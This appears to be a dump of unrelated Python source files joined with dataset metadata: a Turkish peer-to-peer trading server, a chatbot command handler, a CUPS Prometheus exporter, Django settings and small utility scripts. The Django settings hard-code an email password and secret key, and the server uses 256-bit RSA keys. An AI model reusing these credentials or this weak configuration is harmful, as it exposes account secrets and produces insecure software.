kayitSayisi:\r\n break\r\n gonderArray.append(\"DO:END\")\r\n gonderString = \"\"\r\n for i in range(len(gonderArray)):\r\n if gonderArray[i] != \"DO:END\":\r\n gonderString = gonderString + gonderArray[i]+\",\"\r\n else:\r\n gonderString = gonderString + gonderArray[i]\r\n self.tQueue.put(gonderString)\r\n elif parsedData[0] == \"K\":\r\n # kullanım: talepFihristi[talep uid] = [talep adı, talep birimi, talep miktarı, karşılık adı, karşılık birimi, azami(max) karşılık miktarı]\r\n keyword = parsedData[1]\r\n gonderArray = []\r\n gonderArray.append(\"DO:BEGIN\")\r\n for i in self.talepFihristi:\r\n if keyword == self.talepFihristi[i][0]:\r\n gonderArray.append(\"DO:\"+ str(i) + \":\" +str(self.talepFihristi[i][0]) + \":\" + str(self.talepFihristi[i][1]) + \":\"\r\n + str(self.talepFihristi[i][2])+ \":\" + str(self.talepFihristi[i][3])+ \":\" +\r\n str(self.talepFihristi[i][4])+ \":\" + str(self.talepFihristi[i][5]))\r\n gonderArray.append(\"DO:END\")\r\n gonderString = \"\"\r\n for i in range(len(gonderArray)):\r\n if gonderArray[i] != \"DO:END\":\r\n gonderString = gonderString + gonderArray[i] + \",\"\r\n else:\r\n gonderString = gonderString + gonderArray[i]\r\n self.tQueue.put(gonderString)\r\n else:\r\n self.tQueue.put(\"RN\")\r\n\r\n\r\n\r\n elif dataInByte[0:2] == \"TR\".encode():\r\n\r\n type = dataInByte.decode().split(\":\")[1]\r\n\r\n uuid = dataInByte.decode().split(\":\")[2]\r\n\r\n clientFiyat = int(dataInByte.decode().split(\":\")[6]) / int(dataInByte.decode().split(\":\")[4])\r\n\r\n if (type == \"A\"):\r\n\r\n serverTalepFiyat = int(self.talepFihristi.get(int(uuid))[5]) / int(self.talepFihristi.get(int(uuid))[2])\r\n\r\n if (clientFiyat >= serverTalepFiyat):\r\n\r\n clientAdet = dataInByte.decode().split(\":\")[4]\r\n\r\n 
serverAdet = self.talepFihristi.get((int(uuid)))[2]\r\n\r\n if (float(clientAdet) >= float(serverAdet)):\r\n\r\n del self.talepFihristi[int(uuid)]\r\n\r\n print(self.talepFihristi)\r\n\r\n else:\r\n\r\n serverAdet = float(serverAdet) - float(clientAdet)\r\n\r\n self.talepFihristi.get(int(uuid))[2] = serverAdet\r\n\r\n self.talepFihristi.get(int(uuid))[5] = serverTalepFiyat * serverAdet\r\n\r\n print(self.talepFihristi)\r\n\r\n self.tQueue.put(str(dataInByte.decode()).replace(\"TR:\", \"TO:\"))\r\n\r\n else:\r\n\r\n self.tQueue.put(\"TN\")\r\n\r\n if (type == \"T\"):\r\n\r\n serverArzFiyat = int(self.arzFihristi.get((int(uuid)))[5]) / int(self.arzFihristi.get((int(uuid)))[2])\r\n\r\n if (clientFiyat >= serverArzFiyat):\r\n\r\n clientAdet = dataInByte.decode().split(\":\")[4]\r\n\r\n serverAdet = self.arzFihristi.get((int(uuid)))[2]\r\n\r\n if (float(clientAdet) >= float(serverAdet)):\r\n\r\n del self.arzFihristi[int(uuid)]\r\n\r\n else:\r\n\r\n serverAdet = float(serverAdet) - float(clientAdet)\r\n\r\n self.arzFihristi.get(int(uuid))[2] = float(serverAdet)\r\n\r\n self.arzFihristi.get(int(uuid))[5] = float(serverArzFiyat) * float(serverAdet)\r\n\r\n self.tQueue.put(str(dataInByte.decode()).replace(\"TR:\", \"TO:\"))\r\n\r\n else:\r\n\r\n self.tQueue.put(\"TN\")\r\n\r\n\r\n\r\n elif dataInByte[0:2] == \"OF\".encode():\r\n sifreliMetin = dataInByte[3:]\r\n decrypt_message = rsa.decrypt(sifreliMetin, self.my_private_key)\r\n data = decrypt_message.decode()\r\n parsedData = data.split(\":\")\r\n if self.abonelikFihristi[int(self.istemciID)][2] == True:\r\n self.tQueue.put(\"RN\")\r\n elif parsedData[0] == \"N\":\r\n kayitSayisi = parsedData[1]\r\n kayitSayisi = int(kayitSayisi)\r\n if kayitSayisi > len(self.arzFihristi):\r\n kayitSayisi = len(self.arzFihristi)\r\n gonderArray = []\r\n gonderArray.append(\"OO:BEGIN\")\r\n counter = 0\r\n for i in self.arzFihristi:\r\n gonderArray.append(\"OO:\" + str(i) + \":\" + str(self.arzFihristi[i][0]) + \":\" + str(self.arzFihristi[i][1]) + \":\"\r\n + str(self.arzFihristi[i][2]) + \":\" + str(self.arzFihristi[i][3]) + \":\" +\r\n str(self.arzFihristi[i][4]) + \":\" + str(self.arzFihristi[i][5]))\r\n counter=counter+1\r\n if counter == kayitSayisi:\r\n break\r\n gonderArray.append(\"OO:END\")\r\n gonderString = \"\"\r\n for i in range(len(gonderArray)):\r\n if gonderArray[i] != \"OO:END\":\r\n gonderString = gonderString + gonderArray[i] + \",\"\r\n else:\r\n gonderString = gonderString + gonderArray[i]\r\n self.tQueue.put(gonderString)\r\n elif parsedData[0] == \"K\":\r\n # kullanım: arzFihristi[talep uid] = [arz adı, arz birimi, arz miktarı, karşılık adı, karşılık birimi, azami(max) karşılık miktarı]\r\n keyword = parsedData[1]\r\n gonderArray = []\r\n gonderArray.append(\"OO:BEGIN\")\r\n for i in self.arzFihristi:\r\n if keyword == self.arzFihristi[i][0]:\r\n gonderArray.append(\"OO:\" + str(i) + \":\" + str(self.arzFihristi[i][0]) + \":\" + str(self.arzFihristi[i][1]) + \":\"\r\n + str(self.arzFihristi[i][2]) + \":\" + str(self.arzFihristi[i][3]) + \":\" +\r\n str(self.arzFihristi[i][4]) + \":\" + str(self.arzFihristi[i][5]))\r\n gonderArray.append(\"OO:END\")\r\n gonderString = \"\"\r\n for i in range(len(gonderArray)):\r\n if gonderArray[i] != \"OO:END\":\r\n gonderString = gonderString + gonderArray[i] + \",\"\r\n else:\r\n gonderString = gonderString + gonderArray[i]\r\n self.tQueue.put(gonderString)\r\n else:\r\n self.tQueue.put(\"RN\")\r\n else:\r\n self.tQueue.put(\"ER\")\r\n\r\n def run(self):\r\n while True:\r\n incoming_data = 
self.csoc.recv(1024)\r\n self.parser(incoming_data.strip())\r\n if (incoming_data.strip()[0:2] == \"QU\".encode()):\r\n print(\"read thread server QU dasın \")\r\n break\r\n\r\n self.lQueue.put(\"Read thread server sonlandirildi \")\r\n\r\n\r\n\r\n\r\nclass ServerThread(threading.Thread):\r\n def __init__(self, uuid, ip, port, screenQueue, talepFihristi, arzFihristi, komsuArzFihristi, komsuTalepFihristi, komsuFihristi,\r\n abonelikFihristi, my_public_key, my_private_key,lQueue):\r\n threading.Thread.__init__(self)\r\n self.talepFihristi = talepFihristi\r\n self.arzFihristi = arzFihristi\r\n self.komsuArzFihristi = komsuArzFihristi\r\n self.komsuFihristi = komsuFihristi\r\n self.komsuTalepFihristi = komsuTalepFihristi\r\n self.abonelikFihristi = abonelikFihristi\r\n self.s = socket.socket()\r\n self.screenQueue = screenQueue\r\n self.ip = ip\r\n self.port = int(port)\r\n self.my_public_key = my_public_key\r\n self.my_private_key = my_private_key\r\n self.s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR,\r\n 1) # bunu port'u tekrar kullanabilmek için yazdım. yoksa OS boşaltana kadar bayağı bekliyorsunuz serverı başlatırken.\r\n self.s.bind((self.ip, self.port))\r\n self.s.listen()\r\n self.uuid = uuid\r\n self.lQueue=lQueue\r\n def run(self):\r\n while True:\r\n c, addr = self.s.accept()\r\n self.lQueue.put(addr)\r\n self.lQueue.put(\"yeni baglanti eklendi \")\r\n\r\n # fakat tqueue, write thread ve read thread her kullanıcı için unique olmalı. bu yüzden onları burada yaratıp başlatıyoruz.\r\n\r\n yeniThreadQueue = queue.Queue()\r\n\r\n yeniWriteThreadServer = WriteThreadServer(c, addr, yeniThreadQueue,self.lQueue)\r\n yeniReadThreadServer = ReadThreadServer(self.uuid,self.ip , self.port,c, addr, self.screenQueue, yeniThreadQueue,\r\n self.komsuFihristi, self.abonelikFihristi, self.talepFihristi, self.arzFihristi, self.komsuArzFihristi, self.komsuTalepFihristi,\r\n self.my_public_key, self.my_private_key,self.lQueue)\r\n\r\n yeniWriteThreadServer.start()\r\n yeniReadThreadServer.start()\r\n\r\n\r\ndef main():\r\n fname = \"logTXT.txt\"\r\n\r\n\r\n\r\n\r\n lQueue = queue.Queue()\r\n l = LogThread(lQueue, fname)\r\n l.start()\r\n\r\n uuid = 12\r\n # port range= 1025 47808/\r\n # buradadaki degiskenler grub uyeleri kendileri manuel olarak degistirmeli kendine uyarliyip simulasion yapabilmek icin\r\n host = \"0.0.0.0\"\r\n port = 3006\r\n sistemTipi = 'A'\r\n geoloc = \"kordinat\"\r\n kullaniciAdi = \"A\"\r\n\r\n # Public / Private Key tanımlamaları\r\n (my_public_key, my_private_key) = rsa.newkeys(256)\r\n\r\n # tutacağımız data.\r\n talepFihristi = {\r\n 103: [\"Ayva\", \"KG\", 3, \"para\", \"TL\", 15],\r\n 104: [\"Armut\", \"KG\", 4, \"elma\", \"kg\", 5],\r\n 105: [\"Uzum\", \"KG\", 6, \"para\", \"TL\", 25]\r\n } # talepler her sistem için 1 tane olacaktır. istemci bazında olmayacaktır.\r\n # kullanım: talepFihristi[talep uid] = [talep adı, talep birimi, talep miktarı, karşılık adı, karşılık birimi, azami(max) karşılık miktarı]\r\n arzFihristi = {\r\n 102: [\"Karpuz\", \"KG\", 3, \"para\", \"TL\", 15], # 5\r\n 106: [\"Sabun\", \"LT\", 3, \"para\", \"TL\", 15], # 5\r\n 107: [\"Seftali\", \"KG\", 4, \"elma\", \"kg\", 5],\r\n 108: [\"Nektari\", \"KG\", 6, \"para\", \"TL\", 25]\r\n } # arzlar her sistem için 1 tane olacaktır. istemci bazında olmayacaktır.\r\n # kullanım: arzFihristi[arz uid] = [arz adı, arz birimi, arz miktarı, karşılık adı, karşılık birimi, asgari(min) karşılık miktarı]\r\n komsuTalepFihristi = {} # diğer sistemlerin talep listesi burada toplu şekilde tutulacaktır. 
sistemin kendi arz/talep fihristleriyle aynı yapıda yapalım ki\r\n # bir karmaşa olmasın. böylece karşılaştırma yaparken kodlaması daha kolay olur. ayrıca bunlar güncel olmayabilir. bir sistemin bir\r\n # komşusunun listesi değişmiş olabilir. bu fihrist için ilgili öğrenci bir güncelleme fonksiyonu yazmalıdır. zaman ayarlı güncelleme olabilir.\r\n komsuArzFihristi = {} # komsuTalepFihristi ile aynı şeyler bunun için de geçerlidir.\r\n komsuFihristi = { 3: [\"0.0.0.0\", 2266, None, 8, 9, \"kordinat\", \"Mert\", \"A\"],\r\n 4: [\"0.0.0.0\", 2267, None, 10, 11, \"kordinat\", \"Süheyla\", \"A\"],\r\n 1: [\"0.0.0.0\", 2268,None, 12, 13, \"kordinat\", \"Beyza\", \"A\"]}\r\n\r\n # ev sistemi tanıdığı başka evleri bu fihristte tutacaktır.\r\n # kullanım: komsuFihristi[komsuUid] = [ip ve port, en son kontrol zamanı, public key, gps koordinatları, tanıtıcı mesaj, cinsi(A/B), tanışıklık durumu]\r\n # bu bilgilerin selamlaşma ve tanışma aşamasında güncelleneceği ilgili öğrenci tarafından unutulmamalıdır.\r\n # burada üyelik parametresini koymadım. hocanın örneğinde değişikliğe gidiyoruz. abonelik sistemini başka şekilde tutacağız sistemi yormamak için\r\n # ayrıca tanışıklık durumu diye bir parametre koydum. hoca derste tanışıklığın 0-1-2 diye 3 aşamadan oluşacağını, bu durumların da tutulması\r\n # gerektiğini söylemişti. bu parametresi 2 olan, yani bütün tanışıklık adımlarını tamamlayan kullanıcıyla ancak alışveriş başlatılabilir.\r\n # alışverişle ilgili öğrenci bu hususu unutmasın.\r\n\r\n abonelikFihristi = { 3: [True, True, True, True],\r\n 4: [False, False, False, False],\r\n 1: [True, True, True, True]} # bu dictte sistem kendine abone olan ve kendinin abone olduğu komşularını tutacaktır.\r\n # kullanımı: abonelikFihristi[komsuUid] = [bana abone mi? (bool), ben ona abone miyim? (bool), bende engelli mi?, ben onda engelli miyim?]\r\n # bu sistemle hem her abonelik işleminde komsuArzFihristi'ni taramamış olacağız, hem aboneleri ve abone olunanları tek fihristte\r\n # tutacağız hem de aynı anda karşılıklı abonelik durumunda aynı kullanıcıya ait 2 data yaratmamış olacağız. ayrıca\r\n # burada da identifier komsuUid olduğunu kaçırmamak gerekir. bunun sayesinde kolayca komsuFihristi'ne de o kullanıcı icin ulaşılabilecek\r\n # ve işlem yapılabilecektir. 
en azından ben böyle düşündüm.\r\n screenQueue = queue.Queue()\r\n serverth = ServerThread(uuid, host, port, screenQueue, talepFihristi, arzFihristi, komsuArzFihristi, komsuTalepFihristi, komsuFihristi,\r\n abonelikFihristi, my_public_key, my_private_key,lQueue)\r\n lQueue.put(\"Peer server kismi baslatildi\")\r\n serverth.start()\r\n app = ClientDialog(talepFihristi, arzFihristi, komsuArzFihristi, komsuTalepFihristi, komsuFihristi, abonelikFihristi, uuid, host, port,\r\n screenQueue,\r\n sistemTipi, geoloc, kullaniciAdi, my_public_key, my_private_key,lQueue)\r\n lQueue.put((\"Arayuz baslatildi\"))\r\n\r\n app.run()\r\n\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n\r\n\r\n","sub_path":"Smart-Home-System/deneme1.py","file_name":"deneme1.py","file_ext":"py","file_size_in_byte":71599,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"610240591","text":"#!/usr/bin/env python3\n# coding: utf-8\n\nfrom chatterbot import ChatBot\n\n\nclass Command:\n \"\"\" Handle user input and commands.\n \"\"\"\n\n def __init__(self, bot=None, bot_dict=None):\n self._prefix = '@tellme'\n self._user_in = None\n self._bot = bot\n self._bot_dict = bot_dict if isinstance(bot_dict, dict) else {}\n self._error = None\n\n def user_in(self, q=''):\n \"\"\" Remove prefix from the user input and convert it to the list.\n \"\"\"\n user_in = q.split()\n if len(user_in) > 1 and user_in[0]==self._prefix:\n self._user_in = user_in[1:]\n else:\n self._error = 'Please use \"​%s\" prefix with all the input.\\n' % self._prefix\n return self._user_in\n\n @property\n def bot(self):\n return self._bot\n\n @property\n def error(self):\n return self._error\n\n @property\n def _commands(self):\n \"\"\" Known commands.\n \"\"\"\n return {'help': self.bot_help,\n 'list': self.bot_list,\n 'start_session': self.start_session,\n 'end_session': self.end_session}\n\n def run(self, q=''):\n \"\"\" If user input seems valid, then call appropriate handler function.\n \"\"\"\n commands = self._commands\n user_in = self.user_in(q=q)\n if user_in and user_in[0] in commands:\n return commands[user_in[0]]()\n elif user_in and self._bot:\n return self.bot_response()\n else:\n self._error = 'Unknown command...'\n\n# --- Handler functions\n\n def bot_help(self, *a, **kw):\n \"\"\" Print basic help.\n \"\"\"\n msg = 'Please use \"​%s\" prefix with all the input.\\n' % self._prefix\n msg += 'Available Bot commads are:\\n'\n for x in self._commands:\n msg += str('- %s %s\\n' % (self._prefix, x))\n return msg\n\n def bot_list(self, *a, **kw):\n \"\"\" Display Bot list.\n \"\"\"\n msg = 'Currently online:\\n'\n return msg + '\\n'.join('- %s' % b for b in self._bot_dict)\n\n def start_session(self, *a, **kw):\n \"\"\" Starting the session is nothing more than selecting the valid Bot instance.\n \"\"\"\n user_in = self._user_in\n if user_in and len(user_in) > 1:\n bot = ' '.join(self._user_in[1:])\n if bot in self._bot_dict:\n self._bot = self._bot_dict[bot]\n assert isinstance(self._bot, ChatBot),\\\n 'Must be an instance of chatterbot.ChatBot'\n return 'Selected \"%s\" for this session.' 
% self._bot.name\n else:\n self._error = 'Bot \"%s\" does not exist, sorry :/' % bot\n else:\n self._error = \"You've forgotten to specify Bot name\"\n\n def end_session(self, *a, **kw):\n \"\"\" Session is invalidated when there's no Bot selected.\n \"\"\"\n self._bot = None\n return 'Session ended.'\n\n def bot_response(self, *a, **kw):\n \"\"\" Return Bot response to the question.\n \"\"\"\n bot = self._bot\n user_in = ' '.join(self._user_in)\n if not self._bot:\n self._error = \"Please choose a Bot\"\n # Get a response to an input statement\n try:\n bot_response = bot.get_response(user_in)\n except Exception as e:\n self._error = e\n print(e)\n else:\n return bot_response.text","sub_path":"rtmbot/app/plugins/console.py","file_name":"console.py","file_ext":"py","file_size_in_byte":3415,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"290467498","text":"\"\"\"\nThis module reads a file containing predictions.\nFirst line in the file contains the names of columns, including\nnames of players\nRemaining lines contain each a soccer game, real score, followed by\nthe predicted scores by each player\n\nExample first line:\n\nNr.,Date,Group,Side A,Side B,REAL,REAL,Eleven,Eleven,Dustin,Dustin\n\nExample game line:\n\n2,11-Jun,A,Albania,Switzerland,0,1,0,1,0,1\n\"\"\"\n\nimport csv\n\ndef read_predictions(filename):\n \"\"\" Returns three lists\n\n games: list of tuples, each containing information for a game of\n the form: (1, '10-Jun', 'A', 'France', 'Romania', 2, 1)\n The last two items is the score of the game for first\n and second teams\n\n players: list of strings containing name of players\n \n predictions: list of lists,\n each list is for a different player and contains\n one tuple for each game of the form: (x,y) \n where x,y are the scores for the first and second teams\n \"\"\"\n lineno = 0\n data = []\n filereader = csv.reader(open(filename, 'rU', encoding=\"utf-8\"), delimiter=\",\", quotechar='\"')\n games = []\n players = []\n predictions = []\n for line in filereader:\n lineno += 1\n if lineno == 1:\n for i in range(7, len(line),2):\n players.append( line[i] )\n predictions.append( [] )\n continue\n games.append( (int(line[0]),line[1],line[2],line[3],line[4],int(line[5]), int(line[6])) )\n j = 0\n for i in range(7, len(line),2):\n predictions[j].append( (int(line[i]),int(line[i+1])) )\n j += 1\n return games, players, predictions\n\n\nif __name__ == \"__main__\":\n games, players, predictions = read_predictions('predictions_short.txt')\n print (games)\n print (players)\n print (predictions)\n","sub_path":"Homework/Homework 5/hw5util.py","file_name":"hw5util.py","file_ext":"py","file_size_in_byte":1842,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"620657523","text":"import csv\n#import pdb\n\n#pdb.set_trace()\no = []\nwith open('input.txt') as f:\n\tcsvr = csv.reader(f, delimiter=\" \")\n\tfor row in csvr:\n\t\tx = row[1] # Step X must be finished\n\t\ty = row[7] # before step Y can begin.\n\t\tinserted = False\n\t\tif x not in o: o.append(x)\n\t\tif y in o:\n\t\t\tif o.index(x) > o.index(y): # if X is not finished before Y\n\t\t\t\to.remove(y)\n\t\t\telse: # if X is finished before Y already leave order as is\n\t\t\t\tprint(o, ' '.join(row))\n\t\t\t\tcontinue\n\t\tfor l in o[o.index(x)+1:]:\n\t\t\tif y < l:\n\t\t\t\to.insert(o.index(l),y)\n\t\t\t\tinserted = True\n\t\t\t\tbreak\n\t\tif inserted == False: o.append(y)\n\t\tprint(o, ' '.join(row))\n\nprint(\"final 
order:\", ''.join(o), \"letter count:\", len(o))\n","sub_path":"Day 7/day7.py","file_name":"day7.py","file_ext":"py","file_size_in_byte":676,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"276409557","text":"import logging\nimport sys\n\nfrom HardwareRepository.BaseHardwareObjects import HardwareObject\n\nclass Beamline(HardwareObject):\n def __init__(self, name):\n HardwareObject.__init__(self, name)\n self._shutters = {}\n self.energy = None\n self.machine_info = None\n\n\n def init(self):\n try:\n for role in self[\"shutters\"].getRoles():\n self._shutters[role] = self[\"shutters\"].getObjectByRole(role)\n except KeyError:\n pass\n\n roles = [\"energy\", \"machine_info\"]\n\n self.energy = self.getObjectByRole(\"energy\")\n self.machine_info = self.getObjectByRole(\"machine_info\")\n\n optional = self.getProperty(\"optional\").strip().split(\",\")\n\n for role in roles:\n ho = self.getObjectByRole(role)\n\n if not ho and role not in optional:\n logging.error(\"No HardwareObject with role %s\", role)\n sys.exit(-1)\n elif not ho and role in optional:\n logging.error(\"No HardwareObject with role %s\", role)\n else:\n logging.info(\"Nound HardwareObject %s\", role)\n\n setattr(self, role, ho)\n\n\n def get_shutters(self):\n return self._shutters\n","sub_path":"external/SAXHO/Beamline.py","file_name":"Beamline.py","file_ext":"py","file_size_in_byte":1240,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"466732798","text":"import pygame\r\nimport random\r\nfrom random import randint\r\nfrom ElementGraphique import ElementGraphique\r\n\r\nclass ElementGraphiqueAnimee(ElementGraphique):\r\n\t# Le constructeur basique\r\n\tdef __init__(self, img=[],x=0,y=0,effect=None) :\r\n\t\tself.image = img\r\n\t\tself.fps = 0\r\n\t\tself.numimage = 0\r\n\t\tself.deltaX = 10\r\n\t\tself.deltaY = 10\r\n\t\tself.rect = self.image[self.numimage].get_rect()\r\n\t\tself.rect.x = x\r\n\t\tself.rect.y = y\r\n\t\tself.alive = True\r\n\t\tself.effect = effect\r\n\r\n\tdef afficher(self, window) :\r\n\t\tself.fps += 1\r\n\t\tif (self.fps % 1 )== 0:\r\n\t\t\tself.numimage = (self.numimage + 1)%len(self.image)\r\n\t\t\twindow.blit(self.image[self.numimage],self.rect)\r\n\r\n\tdef Deplacer(self, window):\r\n\t\tlargeur, hauteur = window.get_size()\r\n\t\tself.rect.x += self.deltaX\r\n\t\tif self.rect.x <= -10 or self.rect.x >= largeur-self.rect.w :\r\n\t\t\tself.deltaX = - self.deltaX\r\n\t\t\tself.rect.x = self.rect.x\r\n\r\n\t\tself.rect.y += self.deltaY\r\n\t\tif self.rect.y <= 0 or self.rect.y >= hauteur-self.rect.h :\r\n\t\t\tself.deltaY = - self.deltaY\r\n\t\t\tself.rect.y = self.rect.y","sub_path":"Group/Jeux video/genrePacmanProject/Jeux video/ElementGraphiqueAnimee.py","file_name":"ElementGraphiqueAnimee.py","file_ext":"py","file_size_in_byte":1037,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"526104058","text":"#!/usr/bin/env python3\nimport cups\nimport json\nimport time\nfrom prometheus_client import start_http_server, Gauge, Counter\nimport argparse\n\nparser = argparse.ArgumentParser(formatter_class=argparse.ArgumentDefaultsHelpFormatter)\nparser.add_argument(\"--cups-host\", help=\"The cups host to connect to\", default=\"localhost\")\nparser.add_argument(\"--cups-port\", type=int, help=\"The cups port to use\", default=631)\nparser.add_argument(\"--cups-user\", help=\"The user to connect with\", 
default=\"default\")\nparser.add_argument(\"--listen-port\", type=int, help=\"The port the exporter will listen on\", default=9329)\nargs = parser.parse_args()\n\n\n# Define Metrics\nprintJobsNum = Gauge('cups_print_jobs_active', 'Number of current print jobs')\nprintJobsTotal = Counter('cups_print_jobs_total', 'Total number of print jobs')\nprintersNum = Gauge('cups_printers', 'Number of printers')\nprintersStatus = Gauge('cups_printer_status', 'Status about printer alerts', ['printer','model', 'status'])\ncupsUp = Gauge('cups_up', 'CUPS up')\n\n\ndef getPrinterData(conn):\n printers = conn.getPrinters()\n printersNum.set(len(printers))\n return printers\n\ndef getJobData(conn):\n jobs = []\n printJobsTotalold = printJobsTotal._value.get()\n jobs = conn.getJobs(which_jobs=\"all\")\n lastjobID = jobs.keys()[-1]\n printJobsTotalnew = lastjobID\n printJobsTotal.inc(printJobsTotalnew - printJobsTotalold)\n jobs = conn.getJobs()\n printJobsNum.set(len(jobs))\n\n\ndef getPrinterStatus(printers):\n for key, value in printers.items():\n if value['printer-state-reasons'][0] != 'none':\n printersStatus.labels(printer=key, model=value['printer-make-and-model'], status=value['printer-state-reasons'][0]).set(0)\n else:\n printersStatus.labels(printer=key, model=value['printer-make-and-model'], status='happy').set(1)\n\n\nif __name__ == '__main__':\n # Start up the server to expose the metrics.\n start_http_server(args.listen_port)\n\n cups.setServer(args.cups_host)\n cups.setPort(args.cups_port)\n cups.setUser(args.cups_user)\n\n while True:\n try:\n conn = cups.Connection()\n printers = getPrinterData(conn)\n getJobData(conn)\n getPrinterStatus(printers)\n cupsUp.set(1)\n except Exception as e:\n cupsUp.set(0)\n print(e)\n\n time.sleep(5)\n\n","sub_path":"cups_exporter.py","file_name":"cups_exporter.py","file_ext":"py","file_size_in_byte":2249,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"262535931","text":"import os\nimport sys\nfrom tqdm import tqdm\n\n\ndef readFile(filepath):\n f = open(filepath)\n content = f.read()\n f.close()\n return content.splitlines()\n\nif __name__ == '__main__':\n # threshold = str(sys.argv[1])\n filename = str(sys.argv[1])\n extra = int(sys.argv[2])\n # path = os.getcwd() + '/Cov/activeneuron/' + threshold + 'ase/'\n path = os.getcwd() + '/input/'\n # cov = readFile(path + 'neuron_cov')\n cov = readFile(path + filename)\n cnum = len(cov[0])\n nnum = len(cov)\n # f = open(path + 'test_cov','w')\n f = open(path + 'test_cov_' + filename, 'w')\n for i in tqdm(range(cnum)):\n tstr = ''\n for j in range(nnum):\n if cov[j][i] == '1':\n tstr += '1'\n else:\n tstr += '0'\n f.write(tstr + '\\n')\n f.close()\n\n","sub_path":"cifar100/1_nin/2process.py","file_name":"2process.py","file_ext":"py","file_size_in_byte":828,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"471840775","text":"\"\"\"\nDjango settings for cloudserv project.\n\nFor more information on this file, see\nhttps://docs.djangoproject.com/en/1.7/topics/settings/\n\nFor the full list of settings and their values, see\nhttps://docs.djangoproject.com/en/1.7/ref/settings/\n\"\"\"\n\n# Build paths inside the project like this: os.path.join(BASE_DIR, ...)\nimport os\nBASE_DIR = os.path.dirname(os.path.dirname(__file__))\n\n\nSETTINGS_DIR = os.path.dirname(__file__)\n\nPROJECT_PATH = os.path.join(SETTINGS_DIR, os.pardir)\n\nPROJECT_PATH = os.path.abspath(PROJECT_PATH)\nSCRIPTS_DIR = os.path.join(PROJECT_PATH, 
'shellscripts')\n\n\nTEMPLATE_PATH = os.path.join(PROJECT_PATH, 'templates')\n\n\nLOGIN_URL = '/admin/login/'\n# Quick-start development settings - unsuitable for production\n# See https://docs.djangoproject.com/en/1.7/howto/deployment/checklist/\n\n# SECURITY WARNING: keep the secret key used in production secret!\nSECRET_KEY = 'p43_9v+9xlxzv0*!77639@hr3s4fb@taa5ky&_xsjgu(i4v3!+'\n\n# SECURITY WARNING: don't run with debug turned on in production!\nDEBUG = True\n\nTEMPLATE_DEBUG = True\n\nALLOWED_HOSTS = []\n\n\n# Application definition\n\nINSTALLED_APPS = (\n #'django.contrib.admin',\n 'django.contrib.auth',\n 'django.contrib.contenttypes',\n 'django.contrib.sessions',\n 'django.contrib.messages',\n 'django.contrib.staticfiles',\n 'administrator',\n 'cloudservmodels',\n 'rest_framework',\n)\n\nMIDDLEWARE_CLASSES = (\n 'django.contrib.sessions.middleware.SessionMiddleware',\n 'django.middleware.common.CommonMiddleware',\n 'django.middleware.csrf.CsrfViewMiddleware',\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\n 'django.contrib.auth.middleware.SessionAuthenticationMiddleware',\n 'django.contrib.messages.middleware.MessageMiddleware',\n 'django.middleware.clickjacking.XFrameOptionsMiddleware',\n)\n\nROOT_URLCONF = 'cloudserv.urls'\n\nWSGI_APPLICATION = 'cloudserv.wsgi.application'\n\nAUTH_USER_MODEL = 'cloudservmodels.CloudServUser'\n\n# Database\n# https://docs.djangoproject.com/en/1.7/ref/settings/#databases\n\nDATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.mysql',\n 'NAME': 'cloudserv', # Or path to database file if using sqlite3.,\n 'USER': 'root', # Not used with sqlite3.\n 'PASSWORD': '', # Not used with sqlite3.\n 'HOST': 'localhost', \n 'PORT': '3306',\n }\n}\n\n#Email configuration\nEMAIL_HOST = 'smtp.gmail.com'\nEMAIL_HOST_USER = 'qa.cycloides@gmail.com'\nEMAIL_HOST_PASSWORD = 'bolo.mailer'\nEMAIL_PORT = 587\nEMAIL_FROM_ADDRESS = 'qa.cycloides@gmail.com'\nEMAIL_USE_TLS = True\n\n# Internationalization\n# https://docs.djangoproject.com/en/1.7/topics/i18n/\n\nLANGUAGE_CODE = 'en-us'\n\nTIME_ZONE = 'UTC'\n\nUSE_I18N = True\n\nUSE_L10N = True\n\nUSE_TZ = True\n\n\n# Static files (CSS, JavaScript, Images)\n# https://docs.djangoproject.com/en/1.7/howto/static-files/\n\nSTATIC_URL = '/static/'\nSTATIC_FILE_PATH = os.path.join(PROJECT_PATH, 'static')\nSTATICFILES_DIRS = (STATIC_FILE_PATH,)\nTEMPLATE_DIRS = (TEMPLATE_PATH,)\n\nMEDIA_URL = '/media/'\nMEDIA_ROOT = os.path.join(PROJECT_PATH, 'media')\n\nIMAGES_DIR = os.path.join(STATIC_URL, 'images')\n\nLOGO_DIR = os.path.join(IMAGES_DIR, 'logos')\n\nLOGO_STORAGE = os.path.join(STATIC_FILE_PATH, 'images/logos')\n","sub_path":"cloudserv/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":3392,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"}
{"seq_id":"455513816","text":"import numpy as np\n\nsearch = [-50,-68,-70,-65,-78,-55]\n\nB1A = [-46,-78,-72,-70,-81,-59]\nB1B = [None,-82,-85,None,-76,-55]\nB1C = [None,None,None,-78,None,-58]\nB2A = [None,-88,None,None,None,-60]\nB2B = [None,-78,-79,-80,-80,-59]\nteste = [-51,-68,-70,-65,-78,-55]\nresult = []\n\nfor vetor in [B1A, B1B, B1C, B2A, B2B, teste]:\n # returns True or False if they are equal\n #if np.array_equal(search,vetor):\n # result = vetor\n\n # replace missing readings (None) with NaN so the float comparison cannot crash\n vals = np.array([np.nan if v is None else v for v in vetor], dtype=float)\n if np.allclose(search, vals):\n print(vetor)\n\n 
